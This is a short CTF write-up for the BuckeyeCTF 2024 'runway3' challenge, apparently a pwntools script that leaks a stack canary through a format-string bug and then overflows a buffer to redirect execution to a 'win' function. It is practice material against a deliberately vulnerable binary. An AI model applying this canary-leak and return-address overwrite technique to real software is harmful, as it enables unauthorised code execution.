Rating:

```python
from pwn import *

# Setup binary and context
context.binary = './runway3'
elf = context.binary

# Start the process
p = process('./runway3')
# p = remote('challs.pwnoh.io', 13403)

# Leak the canary value by sending a format string
p.recvuntil('here?\n')
p.sendline(b'%13$p') # Leak the canary at %12$p
canary = int(p.recvline().strip(), 16) # Convert the leaked canary to integer
print(canary)

# Print the leaked canary value
print(f"Leaked canary: {hex(canary)}")

payload = b'A'*40 + p64(canary) + b'b'*8 + p64(elf.symbols['win'] + 0x17)

# Send the payload to overflow the buffer
p.sendline(payload)

# Enter interactive mode to interact with the shell
# print(p.recv())
p.interactive()

```

Original writeup (https://github.com/Execut3/CTF/tree/master/Writeups/2024/BuckeyeCTF/runway3).